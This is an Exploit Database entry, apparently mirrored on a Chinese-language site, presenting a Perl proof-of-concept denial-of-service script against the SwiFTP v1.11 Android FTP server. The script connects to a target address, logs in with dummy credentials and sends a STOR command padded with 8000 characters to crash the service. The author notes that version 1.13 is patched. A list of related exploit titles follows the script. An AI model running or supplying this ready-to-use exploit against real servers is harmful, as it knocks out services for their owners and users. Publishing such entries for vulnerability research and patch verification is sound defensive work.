SwiFTP 1.11 – Overflow (Denial of Service) (PoC)

Exploit Database
16 阅读

作者： Julien Bedard

日期： 2010-01-13
类别：
- dos
平台：
- hardware
来源：https://www.exploit-db.com/exploits/11125/

# Exploit Title: SwiFTP v1.11 Overflow Dos PoC
# Software Link: http://swiftp.googlecode.com/files/SwiFTP_1.11.apk
# Version: v1.11
# Tested on: Android OS G1 Rogers / Rooted (CyanogenMod-4.0.4)


#!/usr/bin/perl
############
#
# Simple Dos Crap for the Android app : SwiFTP Server v1.11
# by Julien Bedard
#
# This DoS have been patched in the new version that's why
# I'm releasing it. 
#
# SwiFTP Server v1.11 --> Vulnerable
# SwiFTP Server v1.13 --> Patched
#
####################################

use IO::Socket::INET;

$overflow = 'A' x 8000;

$ftpraw=IO::Socket::INET->new("192.168.2.13:2121") or die;

print $ftpraw "user nouser\n";
print $ftpraw "pass nopass\n";
print $ftpraw "stor $overflow\n";
print $ftpraw "QUIT\n";

close $ftpraw;

last Exploits
SwiFTP 1.11 – Overflow (Denial of Service) (PoC)的更多信息

JPEGsnoop 1.5.2 – WriteAV Crash (PoC)：
AirTies-4450 – Unauthorized Remote Reboot (Denial of Service)：
Microsoft Internet Explorer 6/7 – Remote Denial of Service：
Novell Groupwise Internet Agent – IMAP ‘LIST’ Remote Code Execution：
Wireshark – my_dgt_tbcd_unpack Static Buffer Overflow：
MW6 Technologies Datamatrix – ActiveX ‘Data’ Buffer Overflow：
HP Data Protector Manager 6.11 – RDS Service Remote Denial of Service：
Quick N Easy Web Server 3.3.8 – Denial of Service (PoC)：